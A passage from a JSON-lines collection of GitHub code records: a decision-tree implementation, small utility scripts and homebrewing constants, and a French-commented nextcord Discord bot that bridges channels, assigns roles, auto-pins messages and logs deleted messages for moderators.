Should be of shape (m,).\n\n Returns\n -------\n cost_low : float\n The lowest cost that can be achieved by splitting the feature at\n the value `best_split`.\n best_split : float\n The value in `feature` which is the best split, i.e. the split that\n minimize the cost.\n \"\"\"\n idx_sorted = np.argsort(feature)\n feature = feature[idx_sorted]\n y = y[idx_sorted]\n cost_low = np.inf\n best_split = None\n for v in np.unique(feature)[:-1]:\n r1 = y[feature <= v]\n r2 = y[feature > v]\n cost = self.eval_split(r1, r2)\n if cost < cost_low:\n cost_low = cost\n next_val = feature[feature > v][0]\n best_split = (v + next_val) / 2\n return cost_low, best_split\n\n def eval_split(self, r1, r2):\n raise NotImplementedError\n\n def check_partition(self, y, depth):\n raise NotImplementedError\n\n\nclass ClassificationTree(DecisionTree):\n \"\"\"Classification tree.\n\n Implements decision tree which can be used for classification. It is built\n on the class `DecisionTree` with the only addition is to compute the cost\n function when deciding splits.\n\n Parameters\n ----------\n impurity_measure : {'gini', 'entropy'}\n Defines which impurity measure which should be used when fitting the\n tree.\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, impurity_measure='gini', max_depth=None):\n self.impurity_measure = impurity_measure\n super().__init__(max_depth=max_depth)\n\n def check_partition(self, y, depth):\n \"\"\"Check if `y` only contains one class or if the maximum depth is\n reached.\n\n Parameters\n ----------\n y : ndarray\n An array with class labels.\n depth : int\n The maximum depth of the tree.\n\n Returns\n -------\n check : Leaf instance or None\n A Leaf instance is returned if either `y` only contains one class\n label or if the maximum depth of the tree is reached. Otherwise,\n None is returned.\n \"\"\"\n (y_unique, counts) = np.unique(y, return_counts=True)\n\n if len(y_unique) == 1:\n return Leaf(y_unique)\n\n if self.max_depth is None:\n return None\n elif depth >= self.max_depth:\n idx = np.argmax(counts)\n val = y_unique[idx]\n return Leaf(val)\n else:\n return None\n\n def eval_split(self, y_left, y_right):\n \"\"\"Evaluate a candidate split.\n\n y_left : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_left,).\n y_right : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_right,).\n\n Returns\n -------\n float\n The value of the impurity measure for the given split.\n \"\"\"\n p_left = np.mean(y_left, keepdims=True)\n p_right = np.mean(y_right, keepdims=True)\n if self.impurity_measure == 'gini':\n c_left = gini(p_left)\n c_right = gini(p_right)\n else:\n c_left = enropy(p_left)\n c_right = enropy(p_right)\n n_left = y_left.shape[0]\n n_right = y_right.shape[0]\n n = n_left + n_right\n return (n_left / n) * c_left + (n_right / n) * c_right\n\n def plot_boundaries(self, X, y):\n plt.figure()\n sns.scatterplot(x=X[:, 0], y=X[:, 1], hue=y, style=y, legend=None)\n\n def plot_node(node):\n if isinstance(node, TreeNode):\n if node.feature == 0:\n plt.axvline(x=node.split_val, color='r')\n else:\n plt.axhline(y=node.split_val, color='r')\n plot_node(node.right_child)\n plot_node(node.left_child)\n\n plot_node(self.root)\n plt.show()\n\n\ndef gini(p):\n return 2 * p * (1 - p)\n\n\ndef enropy(p):\n return - (p * np.log(p) + (1 - p) * np.log(1 - p))\n\n\nclass TreeNode(object):\n \"\"\"\n This implements a node in a tree which is not a leaf. 
It is used to store\n information about which feature to split and at which value.\n\n Attributes\n ----------\n feature : int\n split_val : float\n left_child : TreeNode instance or Leaf instance\n right_child : TreeNode instance or Leaf instance\n \"\"\"\n def __init__(self, feature, split_val, left_child, right_child):\n self.feature = feature\n self.split_val = split_val\n self.left_child = left_child\n self.right_child = right_child\n\n\nclass Leaf(object):\n \"\"\"Leaf node.\n\n This implements a leaf node in a tree which is used to store predictions.\n\n Attributes\n ----------\n pred : int\n The predicted label for an observation which ends up in this leaf.\n \"\"\"\n def __init__(self, pred):\n self.pred = int(pred)\n","repo_name":"franslarsson/ml-algo","sub_path":"tree_models/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"392729248","text":"from pyspark.sql.dataframe import DataFrame\nfrom dataquality_bnr.dqSupport import main as dqSup\n\ndef getDataframe(spark, inputData):\n print(\"getDataframe...\")\n \n df=None\n \n if type(inputData) == DataFrame:\n df=inputData\n elif type(inputData) == str:\n inputDataYaml = inputData\n df = dqSup.getDataframe(spark, yaml_path=inputDataYaml)\n \n return df","repo_name":"brunoRenzo6/Spark-DataQuality","sub_path":"dataquality-bnr/dataquality_bnr/yamlHandler/inputData.py","file_name":"inputData.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6866090504","text":"gramsperounce\t= 28.349523\ngramsperpound\t= 16 * gramsperounce\nlitersperquart\t= 0.94635295\nliterspergallon\t= 4 * litersperquart\ngallonsperbarrel= 31\n\t\t # tbsp * cup * quart * gallon\ntsppergallon\t= 3 * 16 * 4 * 4\n\t\t # quart * gallon\ncupspergallon\t= 4 * 4\n\npascalsperbar\t= 100000\npascalsperatm\t= 101325\npascalsperpsi\t= 6894.75729\n\nabsolute_zero_c\t= -273.15\n\nebcpersrm\t= 1.97\n\n# g/l of co2 at stp\nco2_stp_gl\t= 1.977\n\n# in case the maltster doesn't report a fine-coarse difference, use 1.5%\nfine_coarse_diff= 1.5\n\n# need this much conversion power in the entire recipe (WK)\nminconversion\t= 94\n\n# hop absorption, milliliter of wort per gram of hops\npellethop_absorption_mlg = 6\nleafhop_absorption_mlg = 10\n\n# specific volume of grains in l/kg.\n#\n# don't remember where I pulled this figure from, so should\n# check accuracy of it some day.\ngrain_specificvolume = 0.7\n\n# hop densities, via http://www.ebc2017.com/inhalt/uploads/P023_Schuell.pdf\n# used for calculating hops volumes to that we know how much wort fits\n# into the keg. frankly, the volume are so small that it doesn't matter\n# that much, but let's do it just to accommodate for the pathological\n# \"500g leaf hops in a 5gal keg\" case.\n#\n# Also, I'm not sure those values are for the density of the *hops*, not\n# the packaging. need to measure for myself. Just use these numbers\n# for now.\n#\n# in kg/m3 (or g/l)\npellethop_density_gl = 500\nleafhop_density_gl = 135\n\ndatefmt=\"%a %d %b %Y\"\n","repo_name":"anttikantee/wbc","sub_path":"WBC/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"19392500528","text":"# Problem to Solve: What if we need the length of the words separated by a space to be added at the end of that same word and have it returned as an array?\n\n# Examples:\n# \"apple ban\" --> [\"apple 5\", \"ban 3\"]\n# \"you will win\" -->[\"you 3\", \"will 4\", \"win 3\"] \n\n# 1. Determine length of each string\n# 2. Add lenth immediately after each string\n\n# Split single string into list of individuals\n# Loop through list counting each individual string's length.\n# concatenate string with its length Inter \n\n\nstr_1 = \"you will win\"\nstr_2 = \"\"\n\ndef add_length(str_):\n \n lslist = []\n split_string = str_.split()\n for x in split_string:\n l = len(x)\n lslist.append(x + ' ' + str(l))\n \n return lslist\n\n\n\n\n\nprint(add_length(str_1))","repo_name":"JACedwards/Code_Wars_Solutions","sub_path":"Add_Length.py","file_name":"Add_Length.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22080687556","text":"import multiprocessing as mp\nimport time\n\ndef f(name):\n count = 0\n while True: \n print('hello ', name, \"count: \", count)\n count += 1\n time.sleep(1)\n\nif __name__ == '__main__':\n p = mp.Process(target=f, args=('bob',))\n p.start()\n print(\"main process going to sleep\")\n time.sleep(5)\n p2 = mp.Process(target=f, args=('paulo',))\n p2.start()\n print(\"main process going to sleep again\")\n time.sleep(5) \n c = 0\n while True:\n print(\"main\")\n time.sleep(1)\n c += 1\n if c == 10:\n print(\"matar processing\")\n p.terminate()\n","repo_name":"ppereiradev/fault-injector","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34487763794","text":"import sys\nimport functions.link_handler as lh\n\ndef main():\n if not sys.argv[1]:\n print(\"Did not get an URL, please give one\")\n exit\n \n url = sys.argv[1]\n \n print(f\"Starting to gather URLS from {url}\")\n\n links = lh.gather_links_from_url(url)\n\nif __name__ == \"__main__\":\n main()","repo_name":"MichaelNirkman/web-mash","sub_path":"webmash.py","file_name":"webmash.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70651874887","text":"import asyncio\nimport nextcord as discord\nimport os\nimport pickle\nimport requests\nimport sys\nfrom nextcord.ext import commands\nfrom random import randint\nfrom time import sleep\nfrom typing import Optional, Union, Dict, Set, Tuple\ntry:\n from open_digraph import *\nexcept ImportError:\n from .open_digraph import *\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# CONSTANTES ###################################################################\nfrom constantes import ADMINS, TOKEN, prefixeBot\nfrom utils import stockePID, cheminOutputs\nChannelID = Tuple[int, int] #tuple qui contient l'id du salon et l'id du serveur\nMessage = int #l'id du message\nclass Groupe(OpenDigraph):\n def __init__(self):\n super().__init__([], [], [])\n self.originaux: Dict[Message, Message] = dict() #associe à une copie le message original\n self.copies: Dict[Message, Set[Message]] = dict() #associe à un original la liste de ses copies\n self.copiesGuild: Dict[Tuple[Message, ChannelID], Message] = dict() #associe à un message son pendant sur un autre salon\n self.auteur: Dict[Message, str] = dict() #associe à un message le pseudo de son auteur\n\n def salonInGroupe(self: 'Groupe', channelId: ChannelID) -> bool:\n return any(x.getLabel() == channelId for x in self.getNodes())\n def addChannel(self: 'Groupe', channelId: ChannelID) -> None:\n autresNodes = self.getNodeIds()\n self.addNode(channelId, autresNodes, autresNodes)\n def remChannel(self: 'Groupe', channelId: ChannelID) -> None:\n for idNode, node in self.nodes.items():\n if node.getLabel() == channelId:\n self.removeNodeById(idNode)\n def getNodeChannel(self: 'Groupe', channelId: ChannelID) -> Optional[Node]:\n for node in self.getNodes():\n if node.getLabel() == channelId:\n return node\n\n def autresSalons(self: 'Groupe', channelId: ChannelID) -> Set[ChannelID]:\n nodeChannel = self.getNodeChannel(channelId)\n return {self.nodes[idChild].getLabel() for idChild in nodeChannel.getChildrenIds()}\n\n def ajoutMsg(self: 'Groupe', idOriginal: Message, idCopie: Message, channelIdOriginal: ChannelID, channelIdCopie: ChannelID, auteur: str) -> None:\n self.originaux[idCopie] = (idOriginal, channelIdOriginal)\n self.copiesGuild[idCopie, channelIdOriginal] = idOriginal\n self.copiesGuild[idOriginal, channelIdCopie] = idCopie\n self.auteur[idOriginal] = auteur\n self.auteur[idCopie] = auteur\n\n if idOriginal not in self.copies:\n self.copies[idOriginal] = {(idCopie, channelIdCopie)}\n else:\n self.copies[idOriginal].add((idCopie, channelIdCopie))\n\n def copiesMessage(self: 'Groupe', idMsg: Message) -> Set[Tuple[Message, ChannelID]]:\n if idMsg in self.copies: #idMsg est un message original, c'est facile de retrouver ses copies\n return self.copies[idMsg]\n else: #idMsg est une copie par le bot, il faut retrouver l'original et les copies de l'original - idMsg\n original = self.originaux[idMsg]\n return {original} | {x for x in self.copies[original] if x[0] != idMsg}\n def copieDansSalon(self: 'Groupe', idMsg: Message, channelId: ChannelID) -> Optional[Message]:\n if (idMsg, channelId) in self.copiesGuild: #ça ne marche que si idMsg est le message original\n return self.copiesGuild[idMsg, channelId]\n else: #sinon, il faut retrouver l'original\n msgOriginal, channelOriginal = self.originaux[idMsg]\n #par construction le truc suivant existe forcément\n return self.copiesGuild[msgOriginal, channelId]\n def auteurMsg(self: 'Groupe', idMsg: Message) -> str:\n return 
self.auteur[idMsg]\n\nstockePID()\n\n#on récupère les constantes dans le pickle\ncheminPickle = os.path.join(cheminOutputs, \"discordutils.p\")\n\ntry:\n INFOS = dict() if not os.path.exists(cheminPickle) else pickle.load(open(cheminPickle, \"rb\"))\nexcept:\n INFOS = dict()\n\nif True:\n BLANK = \"\" * 3\n\n if \"VOCAL_ROLE\" not in INFOS: INFOS[\"VOCAL_ROLE\"] = dict()\n VOCAL_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"AUTO_ROLE\" not in INFOS: INFOS[\"AUTO_ROLE\"] = dict()\n AUTO_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"BIND_NEW\" not in INFOS: INFOS[\"BIND_NEW\"] = dict()\n BIND_NEW = INFOS[\"BIND_NEW\"]\n\n if \"AUTO_ASSO\" not in INFOS: INFOS[\"AUTO_ASSO\"] = dict()\n AUTO_ASSO = INFOS[\"AUTO_ASSO\"]\n\n if \"AUTO_ROLE_CONF\" not in INFOS: INFOS[\"AUTO_ROLE_CONF\"] = dict()\n AUTO_ROLE_CONF = INFOS[\"AUTO_ROLE_CONF\"]\n\n if \"AUTO_PINS\" not in INFOS: INFOS[\"AUTO_PINS\"] = dict()\n AUTO_PINS = INFOS[\"AUTO_PINS\"]\n\n if \"CLOSE\" not in INFOS: INFOS[\"CLOSE\"] = set()\n CLOSE = INFOS[\"CLOSE\"]\n\n if \"MODO\" not in INFOS: INFOS[\"MODO\"] = dict()\n MODO = INFOS[\"MODO\"]\n\ndef save():\n pickle.dump(INFOS, open(cheminPickle, \"wb\"))\n\ndef estAdmin(usrId): return usrId in ADMINS\n\n\n#TRUCS UTILES ##################################################################\ndef resendFile(url, nomFichier):\n cheminSave = os.path.join(cheminOutputs, nomFichier)\n r = requests.get(url)\n with open(cheminSave, \"wb\") as f:\n f.write(r.content)\n\n return discord.File(cheminSave)\n\ndef supprFichier(fichierDiscord):\n chemin = os.path.join(cheminOutputs, fichierDiscord.filename)\n os.remove(chemin)\n################################################################################\n\nasync def dmChannelUser(user):\n if user.dm_channel is None:\n await user.create_dm() #crée le dm channel, et après user.dm_channel est remplacé par l'objet représentant le dm channel\n return user.dm_channel\n\nasync def bind_new_envoi(msg):\n if msg.content.startswith(BLANK) or msg.author.discriminator == \"0000\": return\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n\n if channelId in BIND_NEW:\n if msg.content == \"\" and msg.embeds == [] and msg.attachments == []: return #c'est un message système qu'on ne veut pas transmettre\n\n groupe = BIND_NEW[BIND_NEW[channelId]]\n auteur, texte, files = msg.author, msg.content, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embeds = msg.embeds\n reference = msg.reference\n pseudoAuteur = auteur.nick or auteur.name\n\n embed = None if embeds == [] or auteur.id != bot.user.id else embeds[0]\n affiNom = f\"{pseudoAuteur} ({msg.guild.name if msg.guild else 'DM'})\"\n texteRenvoye = BLANK + \"**@{} :**\\n{}\".format(affiNom, texte)\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n fichiersHere = files()\n\n if reference:\n referenceId = reference.message_id\n pendantRefChannel = groupe.copieDansSalon(referenceId, (channelCibleId, serveurCibleId))\n objRef = discord.MessageReference(message_id = pendantRefChannel, channel_id = channelCibleId)\n\n retransmis = await channel.send(texteRenvoye, reference = objRef, files = fichiersHere, embed = embed)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name=auteur.name)\n if webhook is None:\n webhook = await channel.create_webhook(name = auteur.name)\n\n retransmis = await webhook.send(texte, wait = True, files = fichiersHere, embed = 
embed, username = affiNom, avatar_url = auteur.avatar.url)\n #retransmis = await channel.send(texteRenvoye, files = fichiersHere, embed = embed)\n\n groupe.ajoutMsg(msg.id, retransmis.id, (channelId, guildId), (channelCibleId, serveurCibleId), pseudoAuteur)\n\n map(supprFichier, fichiersHere)\n sleep(0.4)\n\n if randint(0, 10) == 0: save()\n\nasync def bind_new_edit(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n if msg.author.id == 689536409060900933 or msg.author.discriminator == \"0000\": return #on ne fait rien si le bot modifie son propre message\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n texte, embeds = msg.content, msg.embeds\n pseudoAuteur = groupe.auteurMsg(msg.id)\n\n texteRenvoye = BLANK + \"**@{} ({}) :**\\n{}\".format(pseudoAuteur, msg.guild.name if msg.guild else \"DM\", texte)\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n if echo.reference:\n await echo.edit(content = texteRenvoye)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name = pseudoAuteur)\n if webhook is None:\n webhook = await channel.create_webhook(name = pseudoAuteur)\n\n await webhook.edit_message(echoId, content = texte)\n\nasync def bind_new_del(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n try:\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.delete()\n sleep(0.4)\n except:\n print(\"Mon développeur a triché !\")\n\nasync def bind_new_react_add(reaction, user, bot):\n msg = reaction.message\n channelId = msg.channel.id\n guildId = msg.guild.id\n\n if user.id == 689536409060900933: return #on ne retransmet pas les réactions déjà faites par le bot\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.add_reaction(reaction.emoji)\n sleep(0.4)\n\nasync def bind_new_react_del(reaction, bot):\n pass\n\nasync def bind_new_pin_event(channel, last_pin):\n channelId = channel.id\n guildId = channel.guild.id\n\n if last_pin and channelId in BIND_NEW: #sinon, c'est qu'on a retiré un pin (et pour le moment on ne fait rien)\n lastPinMsg = (await channel.pins())[0]\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(lastPinMsg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n try:\n await echo.pin()\n except:\n print(\"Mon développeur a triché\")\n sleep(0.4)\n\nasync def vocalrole_voicestate(member, before, after):\n channelBefore = before.channel and 
before.channel.id\n #si before.channel est None, il reste None, sinon on prend directement l'id du channel\n channelAfter = after.channel and after.channel.id\n guild = member.guild\n\n if guild.id in VOCAL_ROLE:\n rolesGuild = VOCAL_ROLE[guild.id]\n\n if channelBefore in rolesGuild and (channelAfter not in rolesGuild or (channelAfter in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n retraitRole = guild.get_role(rolesGuild[channelBefore])\n await member.remove_roles(retraitRole)\n\n if channelAfter in rolesGuild and (channelBefore not in rolesGuild or (channelBefore in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n nouvRole = guild.get_role(rolesGuild[channelAfter])\n await member.add_roles(nouvRole)\n\nasync def autorole_react_add(messageId, member, guild, emoji, add = True):\n if (messageId, emoji) in AUTO_ROLE:\n roleId = AUTO_ROLE[messageId, emoji]\n role = guild.get_role(roleId)\n\n if add and role not in member.roles:\n await member.add_roles(role)\n elif not add and role in member.roles:\n await member.remove_roles(role)\n\nasync def autorole_react_del(messageId, member, guild, emoji):\n await autorole_react_add(messageId, member, guild, emoji, False)\n\nasync def autoroleconf_react_add(messageId, member, guild, emoji):\n print(messageId, emoji, (messageId, emoji) in AUTO_ROLE_CONF, len(AUTO_ROLE_CONF))\n if (messageId, emoji) in AUTO_ROLE_CONF:\n roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, toWhoId = AUTO_ROLE_CONF[messageId, emoji]\n role = guild.get_role(roleId)\n\n dm = await dmChannelUser(member)\n\n roleConfirme = toWhoId is not None\n if not roleConfirme:\n if role in member.roles: #si le membre a déjà le rôle, ça vaut comme une confirmation automatique\n roleConfirme = True\n elif serveurAutoId is not None:\n serveurAuto = bot.get_guild(serveurAutoId)\n roleAuto = serveurAuto.get_role(roleAutoId)\n\n try:\n memberAutreServeur = await serveurAuto.fetch_member(member.id)\n except: #le membre n'est pas dans l'autre serveur\n roleConfirme = False\n else:\n roleConfirme = roleAuto in memberAutreServeur.roles\n\n if roleConfirme:\n if toWhoId:\n member = await guild.fetch_member(toWhoId)\n dm = await dmChannelUser(member)\n\n await member.add_roles(role)\n await dm.send(f\"**__Serveur {guild.name}__**\\nC'est bon, ton rôle est confirmé !\")\n\n if toWhoId:\n del AUTO_ROLE_CONF[messageId, emoji]\n save()\n else:\n channelConf = guild.get_channel(channelConfId)\n\n msgConf = await channelConf.send(f\"<@&{pingConfId}> : {member.mention} prétend être du groupe {role.name}. 
C'est vrai ?\")\n await msgConf.add_reaction(\"👍\")\n\n AUTO_ROLE_CONF[msgConf.id, \"👍\"] = (roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, member.id)\n\n save()\n\n await dm.send(f\"**__Serveur {guild.name}__**\\nTu as dit être dans le groupe {role.name}, ce sera confirmé par les admins bientôt.\")\n\nasync def autoasso_react_add(messageId, member, guild, emoji):\n messagesVerifies = (813413525560361010, 813413830918406224) #questions entrée\n messageAcces = 820709722860027915\n roleMembreServeurAsso = 811670434315239424\n memberId = member.id\n\n if messageId in messagesVerifies: #on répond à une question du \"qcm\" d'entrée, on enregistre la question à laquelle le membre a répondu\n if memberId in AUTO_ASSO:\n AUTO_ASSO[memberId].add(messageId)\n else:\n AUTO_ASSO[memberId] = {messageId}\n\n save()\n\n elif messageId == messageAcces: #on demande l'accès en acceptant le règlement\n if memberId not in AUTO_ASSO or len(AUTO_ASSO[memberId]) != len(messagesVerifies): #le qcm n'a pas été répondu\n channel = await dmChannelUser(member)\n\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci d'avoir rejoint le serveur ! Pour y avoir accès, svp mettez bien des réactions aux {len(messagesVerifies)} messages au-dessus de celui qui permet d'accepter le règlement, puis remettre la réaction pour accepter le règlement.\\nÀ bientôt !\")\n else: #le qcm a été répondu, on donne l'accès au reste du serveur\n role = guild.get_role(roleMembreServeurAsso)\n await member.add_roles(role)\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci ! Vous avez maintenant accès au reste du serveur.\")\n\nasync def autopin_react_add(messageId, member, guild, emoji, channel):\n if emoji == \"📌\": #c'est un pin !\n if messageId not in AUTO_PINS:\n AUTO_PINS[messageId] = {member.id}\n else:\n AUTO_PINS[messageId].add(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) == 5: #on a 5 personnes qui demandent un pin, on le fait\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.pin()\n except:\n await channel.send(\"Le bot n'a pas le droit d'épingler des messages ici\")\n\nasync def autopin_react_del(messageId, member, guild, emoji, channel):\n if emoji == \"📌\":\n if messageId in AUTO_PINS:\n AUTO_PINS[messageId].remove(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) < 5:\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.unpin()\n except:\n pass\n\nasync def envoiAutoSuppr(msg, bot):\n if msg.guild and msg.guild.id in MODO and msg.author.id != bot.user.id:\n try:\n channel = await bot.fetch_channel(MODO[msg.guild.id])\n except: #on n'a pas bien récupéré le salon, donc en fait on a 1 id de user, pas de salon\n channel = await bot.fetch_user(MODO[msg.guild.id])\n\n embeds, files = msg.embeds, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embed = None if embeds == [] or msg.author.id != bot.user.id else embeds[0]\n fichierHere = files()\n await channel.send(f\"{str(msg.created_at)} - {str(msg.channel.name)} - {msg.author.nick or msg.author.name} : {msg.content}\", files = fichierHere, embed = embed)\n\nasync def close_envoi(msg):\n channelId = msg.channel.id\n if channelId in CLOSE:\n try:\n await msg.delete()\n except:\n pass\n\ndef main():\n bot = commands.Bot(command_prefix = prefixeBot, help_command = None, intents = discord.Intents.all())\n\n @bot.event #pour ne pas afficher les messages d'erreur de commande inexistante (typiquement si on utilise une 
commande du bot squadro qui est gérée par un autre script)\n async def on_command_error(ctx, error):\n if isinstance(error, commands.CommandNotFound):\n return\n raise error\n\n @bot.event\n async def on_message_edit(_, msg):\n await bind_new_edit(msg)\n\n @bot.event\n async def on_message_delete(msg):\n await bind_new_del(msg)\n await envoiAutoSuppr(msg, bot)\n\n @bot.event\n async def on_member_join(member):\n bans = []\n for guild in bot.guilds:\n try:\n bans += list(x.user.id for x in (await guild.bans()))\n except: pass\n\n try:\n if member.id in bans:\n await member.ban()\n except:\n pass\n\n async def traitementRawReact(payload):\n if payload.guild_id and payload.user_id != bot.user.id: #sinon, on est dans le cas d'une réaction en dm\n messageId = payload.message_id\n guild = bot.get_guild(payload.guild_id)\n user = await guild.fetch_member(payload.user_id)\n channel = bot.get_channel(payload.channel_id)\n\n partEmoji = payload.emoji\n emojiHash = partEmoji.id if partEmoji.is_custom_emoji() else partEmoji.name\n\n return locals()\n else:\n return None\n\n @bot.event\n async def on_raw_reaction_add(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_add(messageId, user, guild, emojiHash)\n await autoasso_react_add(messageId, user, guild, emojiHash)\n await autoroleconf_react_add(messageId, user, guild, emojiHash)\n await autopin_react_add(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_raw_reaction_remove(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_del(messageId, user, guild, emojiHash)\n await autopin_react_del(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_reaction_add(reaction, user):\n await bind_new_react_add(reaction, user, bot)\n @bot.event\n async def on_reaction_clear_emoji(reaction):\n await bind_new_react_del(reaction, bot)\n\n @bot.event\n async def on_voice_state_update(member, before, after):\n await vocalrole_voicestate(member, before, after)\n\n\n @bot.event\n async def on_message(msg):\n #liaison de salon\n await bind_new_envoi(msg)\n await bot.process_commands(msg)\n await close_envoi(msg)\n\n @bot.event\n async def on_guild_channel_pins_update(channel, last_pin):\n await bind_new_pin_event(channel, last_pin)\n\n #bind channels\n @bot.command(name = \"utils_bind\")\n async def bind(ctx, salonSource: discord.TextChannel, serveurCible: int, salonCible: int):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n serveurSource = ctx.guild.id\n\n if salonSource in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonSource]\n else:\n cible = set()\n BINDED_CHANNELS[salonSource] = cible\n\n cible.add((serveurCible, salonCible))\n\n if salonCible in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonCible]\n else:\n cible = set()\n BINDED_CHANNELS[salonCible] = cible\n\n cible.add((serveurSource, salonSource))\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_unbind\")\n async def unbind(ctx, salonSource: discord.TextChannel):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n\n if salonSource 
in BINDED_CHANNELS:\n for (_, channel) in BINDED_CHANNELS[salonSource]:\n BINDED_CHANNELS[channel] = {(x, y) for x, y in BINDED_CHANNELS[channel] if y != salonSource}\n\n BINDED_CHANNELS[salonSource] = set()\n await ctx.message.add_reaction(\"👌\")\n else:\n await ctx.send(\"Ce salon n'était pas relié aux autres\")\n\n save()\n\n #bind new\n @bot.command(name = \"create_bind\")\n async def createBind(ctx):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n int_to_hex = lambda x: hex(x)[2:]\n idGroupe = int_to_hex(randint(1000000, 9999999))\n BIND_NEW[idGroupe] = Groupe()\n\n await ctx.send(f\"Id du groupe : {idGroupe}. Pour ajouter un nouveau salon, il faut lancer la commande `{prefixeBot}bind {idGroupe}`\")\n\n save()\n\n @bot.command(name = \"bind\")\n async def bindnew(ctx, nomGroupe: str):\n channelId = ctx.channel.id\n guildId = ctx.guild.id if ctx.guild else ctx.guild\n\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW and (channelId not in BIND_NEW or BIND_NEW[channelId] == nomGroupe):\n groupe = BIND_NEW[nomGroupe]\n if groupe.salonInGroupe((channelId, guildId)):\n await ctx.message.add_reaction(\"❔\")\n else:\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n elif nomGroupe in BIND_NEW and channelId in BIND_NEW and BIND_NEW[channelId] != nomGroupe:\n groupeOld = BIND_NEW[BIND_NEW[channelId]]\n groupeOld.remChannel((channelId, guildId))\n\n groupe = BIND_NEW[nomGroupe]\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n else:\n await ctx.message.add_reaction(\"❌\")\n\n @bot.command(name = \"del_bind\")\n async def delBind(ctx, nomGroupe: str):\n if 